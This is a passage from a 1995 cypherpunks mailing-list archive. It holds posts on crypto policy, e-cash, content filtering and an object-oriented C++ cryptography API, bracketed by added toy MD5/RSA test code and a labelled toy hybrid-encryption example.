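            result = result * base % modulus
        base = base * base % modulus
        exponent >>= 1
    return result


# Toy key copied from the "TRY:" line of the signature block in the message.
E, D, N = 3, 0x4E243E33, 0x7537D365

# Constructed sample messages (integers below N), including the edge values.
SAMPLES = [0, 1, 2, int.from_bytes(b"PGP", "big"), N - 1]


def rsa_check_failures(messages=SAMPLES):
    """Messages where modexp disagrees with pow() or decryption fails."""
    bad = []
    for m in messages:
        c = modexp(m, E, N)
        if c != pow(m, E, N) or modexp(c, D, N) != m:
            bad.append(m)
    return bad


def factor_semiprime(n):
    """Trial division; practical only because the demo modulus is 31 bits."""
    f = 3
    while f * f <= n:
        if n % f == 0:
            return f, n // f
        f += 2
    raise ValueError("no odd factor found")


def key_is_consistent(e=E, d=D, n=N):
    """Check e*d == 1 mod lcm(p-1, q-1), the condition for round trips."""
    p, q = factor_semiprime(n)
    lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)
    return (e * d) % lam == 1


if __name__ == "__main__":
    print("MD5 failures:", md5_known_answer_failures())
    print("RSA failures:", rsa_check_failures())
    print("key consistent:", key_is_consistent())
```

An empty failure list from both checks is the evidence the message appeals
to; an implementation that fails any vector is listed by its input.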




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Wed, 2 Aug 95 08:39:00 PDT
To: Matthew James Sheppard <Matthew.Sheppard@comp.vuw.ac.nz>
Subject: Re: Provably Correct Crypto?
In-Reply-To: <199508020255.OAA10557@bats.comp.vuw.ac.nz>
Message-ID: <199508021538.LAA08653@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Matthew James Sheppard writes:
> I stipulated I didn't want any such garbage, I specifically said
> english summaries are not acceptable and you bombard me with them.
> Yet you wont accept others opinion of PGP's security, which verbal or
> other wise, can only be an abstract summary.

Not long ago "Dr." Cohen was in a flame war with me (on bugtraq) in
which he claimed exactly the opposite of everything he's claiming here
-- that for enough money it was practical to actually prove the
security of an arbitrarily complex piece of code. Here, of course, he
claims the exact opposite.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Wed, 2 Aug 95 11:53:49 PDT
To: cypherpunks@toad.com
Subject: NYET--attempted formal specs (again)
In-Reply-To: <Pine.3.89.9508020848.A4868-0100000@maria.bga.com>
Message-ID: <199508021853.LAA10598@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Nathan Zook writes:
[ . . . ]
 > NYET-- Non-Youths Exhibit Temperance.
 >  
 > This is a rising, legitimate concern among parents that their children
 > have all-too-easy access to porn on the internet.  Last year, there
[ . . . ]
 >  
 > But none of these proposals can ultimately succeed.  Here I restate my
 > NYET proposal from last year for your consideration.  The system is of
 > necessity ISP-based.  Home-based systems are subject to attacks at
 > home.  Since many (most?) children are better with computers than
 > their parents, these attacks can be expected to succeed.
[ . . . ]
 >
 > The NYET-software runs as superuser on the ISP's machine.  All minor
 > accounts have a corresponding configuration file sitting in their
 > account owner's parent's directory, which is locked with read/write by
 > owner only flags.  The correspondence between minor and parent
 > accounts sits in a file owned by root and similarly locked.
 >  
 > The parent sets the configuration file to permit and deny access to
 > various parts of the net.  Since it is unreasonable for the parent to
[ . . . ]

     Your solution fails against your specified threat.  Children who
are more software-proficient than their parents will, in many cases,
be able to access their parents' accounts and modify the configuration
file (or simply use the account to access the blocked areas).
Ultimately, all such systems are "home-based" if any accounts used by
members of the household have or can be granted access to the naughty
bits (tip o' the hat to M. Python).

     While your proposal is obviously marketable, given the success of
Prodigy and the prospects for SurfWatch, it does not appear to be
inherently more secure than schemes that utilize subscriber software.

Regards,

Patrick May

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Wed, 2 Aug 95 13:21:08 PDT
To: cypherpunks@toad.com
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <B367ZVWMJ1W8O*SADLER_C@SHS.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Subject: Re: Pat Robertson Fears E-cash?
Date: Wed, 2 Aug 1995 11:37:19 PDT
A1-type: DOCUMENT
Importance: normal

<
<On August 2, Peter Trei wrote:
<
<E-cash is a bit of a reach from this, but some of them (eg, 
<Robertson), extend the verses to cover all forms of trackable 
<transactions. I suspect that if someone could get him to realize the 
<privacy aspects of true anonymous ecash, he'd like it.
<
That's making a very large assumption that someone who thinks like
Pat Robertson is a rational human being...

Connie






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Wed, 2 Aug 95 10:42:06 PDT
To: cypherpunks@toad.com
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <9508021741.AA05602@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The relevant verses are in Revelations 13, where some of the actions
by which The Beast can be recognized are given. Among them are:

16 And he causeth all, both small and great, rich and poor, free and 
   bond, to receive a mark in their right hand, or in their foreheads: 
17 And that no man might buy or sell, save he that had the mark, or 
   the name of the beast, or the number of his name.

Millennialist Christians tend to regard this as a method by which 
the faithful will be shut out of the economy, since the pious will
refuse such a 'mark'.

E-cash is a bit of a reach from this, but some of them (eg, 
Robertson), extend the verses to cover all forms of trackable 
transactions. I suspect that if someone could get him to realize the 
privacy aspects of true anonymous ecash, he'd like it.

Just don't propose an implantable cryptographic token :-).



Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 2 Aug 95 11:01:32 PDT
To: cypherpunks@toad.com
Subject: Mierda
Message-ID: <199508021801.OAA03135@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New Yorker of July 31 writes on the indictment of six
   lawyers in Miami on drug-conspiracy charges:

      [Ex-Fed] Abbell continued to do legal work for the Rodriguez
      brothers, and in January, 1991, he hired an obscure
      Miami lawyer, Francisco Laguna, as a full-time
      associate. Laguna, who is in his thirties and was born
      in Colombia and speaks fluent Spanish, appears, from the
      indictment, to have been the most deeply immersed of all
      the lawyers in the day-to-day affairs of the Cali
      cartel. He maintained frequent contact with Miguel
      Rodriguez by public telephone. Unfortunately for Laguna,
      federal agents had obtained the code numbers of the
      debit cards he used to make his calls, and were able to
      intercept many of the conversations.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Wed, 2 Aug 95 12:01:07 PDT
To: "Harry S. Hawk" <habs@warwick.com>
Subject: Re: Consumer Report: RSA T-Shirt
In-Reply-To: <199508021411.KAA05924@cmyk.warwick.com>
Message-ID: <Pine.SUN.3.91.950802140354.5538A-100000@bambam>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Harry S. Hawk wrote:

> 
> I have only one complaint. That is the "machine readable" rsa barcodes.
> 
> To my eye the printing job there is rather poor. I doubt it is
> machine readable (although I don't have a 128 barcode reader to
> try it out with)..

We tried it and it does not read.

I am still very happy with the product 8-)


-Mike

**************************************************************************
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*                http://www.computek.net/public/bailey                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ray Cromwell" <s5cromw@watson.ibm.com>
Date: Wed, 2 Aug 95 11:26:05 PDT
To: cypherpunks@toad.com
Subject: Object Oriented Crypto API
Message-ID: <9508021824.AA16891@play.watson.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain



C'punks,
  It seems to me that one of the reasons why crypto isn't being incorporated
into lots of applications is because there is no good general purpose
plug-n-play crypto-library.  I mean something that is so easy to use
that a Visual Basic programmer would understand it. I've had personal
experience with RSA's BSAFE library and I have to admit, it has
a better software architecture than any of the cypherpunk attempts.
It's highly portable and highly object oriented. Algorithms can be
dropped in and out easily. But it suffers from not being user
extensible, not having a variety of algorithms, and faking
object-orientation in C.  I think we can do better. (and we're not
as legally restricted as they are) We also need an architecture
that will facilitate collective work so that we do not duplicate
efforts.

  I recently checked out Crypto++ by Wei Dai. It's a real tour de
force of algorithms, and probably violates more patents in a single
piece of software than any in history. ;-) But it has some small design
quirks, and with a little bit of modification on the user interface
side (leveraging the code already written), I think it can be improved
by leaps and bounds. (IMHO)

Prelude
-------
  C++ will be our language of choice. A C-to-C++ API will be discussed
later. Note: in some parts, only pseudo-C++ is used, so don't expect this
to pass a C++ grammar.

The Design Goal
---------------
  The goal is to define an architecture permitting a simple API which
can perform all of the standard cryptographic operations (Encryption,
Signing, Key Management, etc) without strict dependency on any
algorithm, file format, or I/O mechanism. An application writer
should be able to incorporate cryptography into his application
without worrying about fileformats, key management, cryptographic
algorithms, or distribution. He should be able to seamlessly operate
on PEM messages, pgp files, etc without even knowing what the files
are. (I've looked at GSSAPI, it addresses different issues)

Here's a first-pass API:

Encrypt(EncryptionAlgorithm, EncryptionKey, PlainText, CipherText)
Decrypt(DecryptionAlgorithm, DecryptionKey, CipherText, PlainText)
Sign(SignatureAlgorithm, PrivateKey, PlainText, Signature)
Verify(VerifierAlgorithm, PublicKey, PlainText, Signature)
GetKey(KeyDomain, KeyId, Key)
PutKey(KeyDomain, KeyId, Key)
GenerateKey(EncryptionAlgorithm, RandomNumberGenerator, Key)

That's it, just 7 functions to perform almost all cryptographic
algorithms in the universe. P-Key and Symmetric systems aren't even
treated differently. A few more could be added to the API, but that's
the gist. Now let's look at how we will accomplish this abstraction.

Polymorphism is your friend
---------------------------

  While Crypto++ does have an object hierarchy, polymorphism is rarely
used. For instance, the Sign function signs raw data, not "Digests".
It does sign a Digest if you give it raw data that is a Digest, but
the point is, the function doesn't know. The idea of Signing should
be abstracted above and away from low-level representations and
the underlying cryptosystem itself.

(this philosophy of abstraction is drawn strongly from STL - the
standard template library which is a C++ working draft. It's a
great library design)

  Let's look at a single example: The Encrypt function.

  All encryption algorithms have a property in common, whether it is
a public key system, a symmetric block cipher, or a stream cipher: the
encryption key. Therefore, they can all be treated as-a member of a class
of EncryptionAlgorithm objects which implement a function called
encrypt(), which takes some plaintext, an encryption key, and outputs
some ciphertext. Nothing magical here, simple object-orientation.

A hypothetical abstract base EncryptionAlgorithm class might look like:

class EncryptionAlgorithm
{
public:
  virtual void encrypt(EncryptionKey& key, PlainText& p, CipherText& c) = 0;
  virtual EncryptionKey generate_key(RandomNumberGenerator& rng) = 0;
};


And a possible concrete class:

class DESEncryptionAlgorithm : public EncryptionAlgorithm
{
  typedef DESEncryptionKey keytype;
public:
  void encrypt(DESEncryptionKey& key, PlainText& p, CipherText& c);
  keytype generate_key(RandomNumberGenerator& rng);
};


So to encrypt something with DES, you'd instantiate a DESEncryptionAlgorithm,
say labeled des, generate a key by asking the class to generate one, and
then call

Encrypt(des, deskey, plaintext, ciphertext);

But that 'des' could have just as well been a RSAEncryptionAlgorithm class,
in which case, the plaintext would have been encrypted with an rsa
public key (independent of whether DES or IDEA is being used as the
underlying BlockCipher)

Our design methodology throughout this article will be to look for common
behavior between algorithms and where it is found, define an abstract
base class around that behavior. Any specialization will be handled by
subclassing.

The case for Decrypt() looks almost identical, in fact, we could
overload Encrypt(), and call them both Crypt() and have asymmetrical
ciphers work like symmetric ciphers. (the compiler would detect
a DecryptionAlgorithm instead of EncryptionAlgorithm and do the
necessary magic) I feel this is a bad design decision because
it is confusing and removes some type safety. The processes of
encryption and decryption are semantically different, therefore
they deserve separate interfaces.

Now that you've seen an example, let's proceed with the design.

SignatureAlgorithm
------------------
Signature systems typically sign "Message Digests", so intuition should
lead us to assume that we must have a "MessageDigest" object which
a SignatureAlgorithm may sign. "Message Digests" are generally produced
by one-way secure hash algorithms, so we also need a SecureHashAlgorithm
object that computes a MessageDigest given a PlainText. A MessageDigest
should be convertible to a BitString for signing. Finally, a signature
should be abstracted into a Signature class which has an equality
condition. With those thoughts, here's a proposed class.


class SignatureAlgorithm
{
protected:
  SecureHashAlgorithm& hashref;  // protected so concrete signers can hash
public:
  SignatureAlgorithm(SecureHashAlgorithm& h);
  // signing uses the signer's private key
  virtual Signature sign(PrivateKey, PlainText, CipherText) = 0;
};

class Signature
{
public:
  virtual bool operator==(Signature& s) = 0;
  // functions to cast to/from bitstring
};

Concrete example:

class RSASignature : public Signature { };

class RSASignatureAlgorithm: public SignatureAlgorithm,
			     private RSADecryptionAlgorithm
	                     // privately inherited because the
                             // relationship is "implemented-in-terms-of"
{
public:
  typedef RSADecryptionAlgorithm::keytype keytype;
  typedef RSASignature sigtype;
  RSASignatureAlgorithm(SecureHashAlgorithm& h) :
	SignatureAlgorithm(h) {  }
  sigtype sign(keytype& privatekey, PlainText& p, CipherText& c)
	{
	    decrypt(privatekey, hashref.digest(p), c);
	    return sigtype(c); /* signature constructed from signed
                                  message digest bitstring */
	}
};

Notice how the message digest (hash) algorithm is a polymorphic type. When
the object is constructed, it can be told to use any hash algorithm
independent of hash size, etc.

Verification works similarly. A concrete example

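class RSAVerifierAlgorithm: public SignatureAlgorithm,
	                    private RSAEncryptionAlgorithm
{
public:
  bool verify(keytype& publickey, PlainText& p, Signature& s)
	{
            CipherText recovered;
	    // apply the public-key operation to the signature to recover
	    // the digest that was signed, then compare with our own digest
	    raw_encrypt(publickey, s, recovered);
	    return recovered == hashref.digest(p);
	}
};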

Key Retrieval
-------------
I will assume for sake of simplicity that all keys have a KeyId associated
with them, perhaps just the name of the person who owns the key. A KeyID
is much like an ISBN number for a book. Whether you're in the Library
of Congress, B Dalton Bookstore, or searching an electronic catalog,
you can still find the book. What's common about the different mediums
where the book is located is that 1) it's still a book, and 2) it has an
ISBN. So, our model will be to generalize the places keys are found into
things called KeyDomain, and to generalize the ID of a key into something
called a KeyID. The function of a KeyDomain is to be able to retrieve/store
a Key based on a KeyID. A KeyDomain might be just a KeyRing on your
filesystem, or it may be a KeyServer. The key idea ( ;-) ) here is that
it doesn't matter.

Problems however start to arise when a single KeyDomain can store keys
for multiple algorithm types. For instance, a KeyServer storing keys
for both DSA and RSA. I don't know if this is a bad idea or not, but
since people will probably want to do it, it's probably a good idea to
support it.  One possibility is to have the KeyDomain return a generic
Key pointer, and use RTTI (run time type identification) to cast the
pointer to the appropriate type. I think this is a bad paradigm which
will lead to lots of programming errors and most C++ compilers don't
support RTTI yet. Therefore, my idea is to have a KeyDomain for each
cryptosystem which returns only keys of the type that cryptosystem
uses. The KeyDomain itself may be a KeyServer that connects to some
internet based server which stores lots of different key types, but
the idea is that the KeyServer filters out key requests which do not
conform to the type required. If you ask an RSAKeyServer for a KeyID
that corresponds to a DSA key, it will fail to find it even though the
physical server may actually store it.

The same comments go for a KeyRing which stores multiple types. A typical
object hierarchy may look like this:

                                 KeyDomain
                               (Returns Key)
                                /          \
                         RSAKeyDomain       DSAKeyDomain
                        (Returns RSAKey)    (Returns DSAKey)
                            /    \                /         \
                     RSAKeyRing  RSAKeyServer  DSAKeyRing    DSAKeyServer

(The *KeyRing and *KeyServer above also multiply inherit from KeyRing and
KeyServer respectively. This is to encapsulate network and file i/o
abstractions) My first shot at the base class is

class KeyDomain
{
public:
  typedef Key keytype;
  virtual keytype fetch(KeyId) = 0;
  virtual void put(KeyId, keytype) = 0;  // store a key under its KeyId
};

class RSAKeyDomain
{
public:
  typedef RSAKey keytype;
  virtual keytype fetch(KeyId) = 0;
  virtual void put(KeyId, keytype) = 0;
};

KeyRing and KeyServer are important because they will encapsulate
the i/o functions necessary and store information (like the hostname
and port of a keyserver), but I can not define them right now without
more research into existing formats and protocols. Just picture
in your head, the KeyRing and KeyServer objects containing a nebulous
cloud which does the appropriate magic.

class KeyRing
{
  magic_io_function(magic_arg); // implements file system fetches
};

class RSAKeyRing : public RSAKeyDomain, public KeyRing
{
  // example fetch
  keytype fetch(KeyId) { return magic_io_function(magic_manipulate(KeyId)); }
};

Key Generation
--------------
  Key generation is dependent on two things. The cryptographic algorithm
being used and the random number generator used. The problem with the
examples given earlier is that the generation of encryption and decryption
keys can normally not be done separately. An encryption and decryption
key are intimately related by virtue of the fact that they are semantic
inverses. Therefore, what really should be generated is not individual
keys, but key pairs. Furthermore, since the encryptor usually generates
the keys, I'm placing the KeyPair generating function on the
EncryptionAlgorithm. An alternative architecture is to define another
object hierarchy called "KeyGenerator" and subclass "RSAKeyGenerator",
"DESKeyGenerator", etc. In the case of symmetric algorithms, such as a
DESKeyPair, the object would only store the secret key, but the
"get" functions on the object would return the same key whether you are
asking for the encryption key or the decryption key.

Imagine the following

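KeyStrokeBitSource keystrokes;  // named object: "bbsg(KeyStrokeBitSource())"
                                // would parse as a function declaration
BlumBlumShubGenerator bbsg(keystrokes);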
DESAlgorithm des;
DESKeyPair dpair = des.generate_key(bbsg);

des.encrypt(dpair.encryptionkey(), plaintext, ciphertext);

DESKeyPair might look like this

class DESKeyPair : public KeyPair
{
private:
  private_storage_type x;
public:
 // both functions return the same key 'x'
  DESEncryptionKey encryptionkey() { return DESEncryptionKey(x); }
  DESDecryptionKey decryptionkey() { return DESDecryptionKey(x); }
};

Division of Labor
-----------------
  By defining a standard set of abstract interfaces, reusable software
components are possible. This means that cypherpunks can write code
at the micro-level,  optimize it, implement the newest algorithms,
and distribute the result, which can then automagically be included
in software applications by simply relinking. (and with a Java
implementation, it really is automagic ;-)) Also, since only
those objects which are used are linked in, executable size can be
kept small. By using abstract base classes, and isolating implementation
from interface, recompiles can be kept to a minimum.


Low Level Hierarchy
-------------------
  Since public key algorithms often need BlockCiphers to accomplish
encryption, several further abstractions are needed.


BlockCipherEncrypt (child of EncryptionAlgorithm)
     encrypt(key, plaintext, ciphertext)
     generate_key(randomnumbergenerator)
BlockCipherDecrypt (child of DecryptionAlgorithm)
     decrypt(key, plaintext, ciphertext)

These are generic classes that specify an interface for symmetric
block ciphers.


example (refined from earlier):
class DESEncryptionAlgorithm: public BlockCipherEncrypt
{
public:
	typedef DESKey keytype;
	void encrypt(key, plaintext, ciphertext);
	keytype generate_key(RandomNumberGenerator);
};


A public key algorithm is a special case of an algorithm, so

class PublicKeyEncryptionAlgorithm : public EncryptionAlgorithm
{
protected:
   BlockCipherEncrypt& bc_enc;  // protected: concrete classes call it
public:
    	PublicKeyEncryptionAlgorithm(BlockCipherEncrypt& bc);
	void encrypt(PublicKey, PlainText, CipherText);
        void raw_encrypt(PublicKey, PlainText, CipherText); // used for signing
                                                            // digests
};

All public key algorithms are constructed with a BlockCipher so that
the encrypt function knows which cipher to use (unless of course
you are only using raw_encrypt(). Using normal encrypt() without
initializing with a BlockCipher should throw an exception). The
PublicKeyDecryptionAlgorithm class is defined similarly with
BlockCipherDecrypt;

Given these classes, here's how an RSA concrete class might look.

class RSAimplement; // implements low-level rsa operation
                    // after all, encryption and decryption are just
                    // modular exponentiation. Let's call this
                    // rsa_op(factor, exponent, modulus)

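class RSAEncryptionAlgorithm : public PublicKeyEncryptionAlgorithm,
                               private RSAimplement
{
public:
	RSAEncryptionAlgorithm(BlockCipherEncrypt& foo)
	    : PublicKeyEncryptionAlgorithm(foo) {}   // base class owns bc_enc
	void encrypt(RSAPublicKey& r, PlainText& p, CipherText& c)
	{
	   KeyBoardRandomBitSource kbd;   // named object, so bbs is not parsed
	   BlumBlumShubGenerator bbs(kbd); // as a function declaration
	   BlockCipherKey session_key=bc_enc.generate_key(bbs);
	   bc_enc.encrypt(session_key, p, c);
	   // the RSA-wrapped session key has to travel with c, otherwise
	   // the recipient cannot recover session_key
	   rsa_op(session_key, r.exponent(), r.modulus());
	}
};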

Typical usage pattern might be as follows:


DESAlgorithm des;
RSAAlgorithm rsa(des);
KeyID kid("deepthroat");
RSAKeyServer rsaks("blacknet.net", PORT_BLACK);
PlainText p; // pictures of Senator Exon being spanked by his Mistress
CipherText c;
RSAKey pkey;
RFC822Encoding email;

pkey=rsaks.fetch(kid);
Encrypt(rsa, pkey, p, c);
email.encode(c);

cout << email;

Auxiliary class hierarchies
---------------------------
  Many of the above classes depend on polymorphic lower-level classes
to implement hash algorithms, key generation, random number generation,
number theory, primality testing, output encoding, and so on. The
following are just a few example hierarchies. (class interfaces will be
defined later)


These classes form the hash of a Plaintext and return MessageDigest
SecureHashAlgorithm---------------------------------------------------
         |                   |                    |                  |
    MD5Algorithm      NISTSecureHash            Haval              Snefru


These classes return a random bitstring of a specified number of bits
RandomNumberGenerator-------------------------------------------------
         |                   |                    |                  |
 BlumBlumShubGenerator   HashGenerator        UnixRand      RadioactiveHardWare


These classes test an Integer for the specified type of primality and
optionally suggest an increment value (to find the next such prime)
ProbablePrimeTest-----------------------------------------------------
         |                   |                    |                  |
    FermatTest          MillerRabin            StrongPrime        BlumPrime

(e.g. a RandomPrime routine might take a RandomNumberGenerator and a
       ProbablePrimeTest as arguments. It uses the RNG to get a starting
       point, sieves a number, and if it passes the test, lets the
       PPT object test it for the right qualities. )

Comments
--------
  Some of you may be asking "what's the point? Some libraries like Crypto++
can already compute all these things." The point of this exercise is to
devise an object hierarchy, interface, and dependency between these
algorithms so that they can interoperate without the user having to know
how they interoperate (or perform conversions himself between the different
formats each algorithm expects). Algorithms share common data formats and
interfaces.

  One crucial design feature of this hierarchy is that the graphs contain
no cycles. This alleviates the need to worry about virtual base classes
in multiple inheritance or object overlap.

Criticism
---------
  * overuse of subclassing might be slow
    answer: the performance impact of a virtual function call is minimal
            in comparison to performing a modular exponentiation

  * encapsulating raw data like digests into objects like MessageDigest
        when they are just going to be converted back to a raw bitstring
        is a waste of time and cpu
    answer: the cost is that of setting a pointer to a databuffer and
            returning that pointer thru a class interface which can be
            inlined. the gain in abstraction which allows several different
            representations of digests, plus the type safety is worth the
            trade off. In the worst case, typedef MessageDigest to your
            favorite type.

  * C is more popular, we need a C library, not a C++ one
    answer: define a C interface library which hides the C++ and
            controls objects via tags. e.g.
            enum algorithms { RSA_ALGORITHM, DES_ALGORITHM, ... }
            encrypt(RSA_ALGORITHM, ....);
            the encrypt function would perform a case statement on
            these tags and allocate the appropriate C++ objects.
            We still gain abstraction and component behavior.

  * I think your class hierarchy sucks
    answer: then make some suggestions on how to improve it

  * object oriented programming is a fad, it doesn't gain you anything
    answer: it all depends on the design. Almost all new languages nowadays
            are OO, and C++ is one of the fastest growing languages in the
            market. OO has proven advantages.

  * this is too much work
    answer: the bulk of the work is already done. Crypto++ has the
            actual implementation of most of these functions. All we
            need to do is write the definitions of these classes with
            appropriate forwarding functions.

  * The NSA doesn't like "crypto hooks", this object oriented component
    system allows any algorithm to be "dropped in"
    answer: NSA who? Sorry, I don't recall.


Encoding
--------
  I purposely left this part out. It's the most complex piece of the design
but it is doable. The basic idea is to make all the objects "persistent"
in that they have a type id, and know how to translate themselves into
an internal stream based data format. Encoding objects would construct
streams out of keys, and algorithm outputs, and ciphertexts, and Integers,
etc. Later, StreamModules would take these streams and translate them into
the appropriate real world format (like PGP's CTB cyphertext block stuff).
Likewise, those same modules would construct a protocol stream from
the real world format, and Decoding objects would turn those into objects.



Finally, a picture
------------------


EncryptionAlgorithm----
     |                 |
 PKeyEncAlgorithm      BlockCipherEncAlgorithm
   |         |               |           |
  RSAEncAlg  ElGamalEncAlg   DESEncAlg   IDEAEncAlg
      |            |             |            |
      |            |             |            |
      |            |             |            |
 RSAAlgorithm  ElGamalAlg    DESAlgorithm  IDEAAlgorithm
      |            |             |            |
      |            |             |            |
      |            |             |            |
  RSADecAlg  ElGamalDecAlg   DESDecAlg   IDEADecAlg
     |       |               |           |
 PKeyDecAlgorithm      BlockCipherDecAlgorithm
     |                 |
DecryptionAlgorithm----




-Ray Cromwell <rjc@clark.net>
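
The hybrid pattern sketched in the message above (a public-key algorithm constructed with a block cipher, with encrypt() refusing to run without one), as an added example that is not part of the original post or of Crypto++. The toy XOR cipher, the fixed-seed generator, the 3233/17/2753 demo key, the pointer-typed constructor argument and HybridCiphertext are assumptions made for illustration, and none of the primitives is secure.

```cpp
#include <cstdint>
#include <iostream>
#include <stdexcept>
#include <string>
#include <vector>

using Bytes = std::vector<std::uint8_t>;

// Toy primitives constructed for this example; none of them is secure.
struct RandomNumberGenerator {
    virtual ~RandomNumberGenerator() = default;
    virtual std::uint32_t bits(unsigned n) = 0;          // 1 <= n <= 32
};
struct FixedSeedGenerator : RandomNumberGenerator {      // repeatable, so not random
    std::uint32_t state;
    explicit FixedSeedGenerator(std::uint32_t seed) : state(seed) {}
    std::uint32_t bits(unsigned n) override {
        state = state * 1664525u + 1013904223u;
        return state >> (32 - n);
    }
};

struct BlockCipherEncrypt {                              // interface named in the post
    virtual ~BlockCipherEncrypt() = default;
    virtual std::uint32_t generate_key(RandomNumberGenerator& rng) = 0;
    virtual void encrypt(std::uint32_t key, const Bytes& in, Bytes& out) = 0;
};
struct ToyXorCipher : BlockCipherEncrypt {               // keystream XOR: decrypt == encrypt
    std::uint32_t generate_key(RandomNumberGenerator& rng) override {
        return rng.bits(11);                             // < 2048, below the demo modulus
    }
    void encrypt(std::uint32_t key, const Bytes& in, Bytes& out) override {
        out.clear();
        std::uint32_t s = key;
        for (std::uint8_t b : in) {
            s = s * 1103515245u + 12345u;
            out.push_back(static_cast<std::uint8_t>(b ^ (s >> 16)));
        }
    }
};

struct PublicKey { std::uint64_t exponent, modulus; };
const PublicKey DEMO_PUB{17, 3233};                      // toy key, n = 61 * 53
const std::uint64_t DEMO_PRIV_EXP = 2753;                // matching private exponent

// Square-and-multiply; safe from overflow only for small demo moduli.
std::uint64_t rsa_op(std::uint64_t base, std::uint64_t exp, std::uint64_t mod) {
    std::uint64_t result = 1 % mod;
    base %= mod;
    for (; exp; exp >>= 1) {
        if (exp & 1) result = result * base % mod;
        base = base * base % mod;
    }
    return result;
}

struct HybridCiphertext { std::uint64_t wrapped_key; Bytes body; };

class PublicKeyEncryptionAlgorithm {
protected:
    RandomNumberGenerator& rng;
    BlockCipherEncrypt* bc_enc;                          // null means raw_encrypt() only
public:
    PublicKeyEncryptionAlgorithm(RandomNumberGenerator& r, BlockCipherEncrypt* bc)
        : rng(r), bc_enc(bc) {}
    virtual ~PublicKeyEncryptionAlgorithm() = default;
    virtual std::uint64_t raw_encrypt(const PublicKey& k, std::uint64_t m) = 0;
    HybridCiphertext encrypt(const PublicKey& k, const Bytes& plain) {
        if (!bc_enc) throw std::logic_error("encrypt() needs a block cipher");
        std::uint32_t session = bc_enc->generate_key(rng);
        HybridCiphertext out;
        bc_enc->encrypt(session, plain, out.body);
        out.wrapped_key = raw_encrypt(k, session);       // keep the wrapped key with the body
        return out;
    }
};
class RSAEncryptionAlgorithm : public PublicKeyEncryptionAlgorithm {
public:
    RSAEncryptionAlgorithm(RandomNumberGenerator& r, BlockCipherEncrypt* bc = nullptr)
        : PublicKeyEncryptionAlgorithm(r, bc) {}
    std::uint64_t raw_encrypt(const PublicKey& k, std::uint64_t m) override {
        if (m >= k.modulus) throw std::domain_error("message must be below the modulus");
        return rsa_op(m, k.exponent, k.modulus);         // unpadded textbook RSA, demo only
    }
};

bool roundtrip_ok() {
    FixedSeedGenerator rng(42);
    ToyXorCipher cipher;
    RSAEncryptionAlgorithm rsa(rng, &cipher);
    const std::string msg = "constructed sample plaintext";
    Bytes plain(msg.begin(), msg.end());
    HybridCiphertext ct = rsa.encrypt(DEMO_PUB, plain);
    // Recipient side: unwrap the session key, then run the symmetric cipher.
    std::uint32_t session = static_cast<std::uint32_t>(
        rsa_op(ct.wrapped_key, DEMO_PRIV_EXP, DEMO_PUB.modulus));
    Bytes recovered;
    cipher.encrypt(session, ct.body, recovered);
    return recovered == plain;
}
bool encrypt_without_cipher_throws() {
    FixedSeedGenerator rng(42);
    RSAEncryptionAlgorithm raw_only(rng);                // constructed for raw use only
    try { raw_only.encrypt(DEMO_PUB, Bytes{1, 2, 3}); }
    catch (const std::logic_error&) { return true; }
    return false;
}

int main() {
    std::cout << "round trip: " << roundtrip_ok() << "\n"
              << "no cipher throws: " << encrypt_without_cipher_throws() << "\n";
}
```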





















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 2 Aug 95 14:44:31 PDT
To: cypherpunks@toad.com
Subject: Re: US vs Overseas Banks
Message-ID: <v02120d1eac45b00dab31@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



>>
>> Of course, this bank has been criticized for being somewhat lax on who
>> they give accounts to, but the point still stands.  I could have been
>> anybody, and give any false address.  *shrug*
>
>Why should they give a damn who you are?  IMO, it's none of their
>business.  Hell, they're making $$$ on *your* deposits, it's time they
>stopped being such shits about it.

Mostly they are afraid that you will get checks under a fake name, and
bounce a lot of them, which ends up costing them a lot of money, even
though they don't pay off on them. (Most of the costs of any financial
transaction system come from handling exceptions). They are also
under obligation to provide accurate SSN or Business Tax-ID information
to the government on any interest-bearing account, so that you are
forced to declare it on your income taxes.

Clearly there are other ways of preventing or insuring against the
problems that arise from check fraud (such as not issuing checks),
but the IRS requirements are out of the bank's hands.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 2 Aug 95 15:26:40 PDT
To: Kragen J Sittler <xentrac@unm.edu>
Subject: DETWEILLER
In-Reply-To: <Pine.A32.3.91.950802142803.44927A-100000@pegasus.unm.edu>
Message-ID: <Pine.SUN.3.91.950802144812.22631E-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


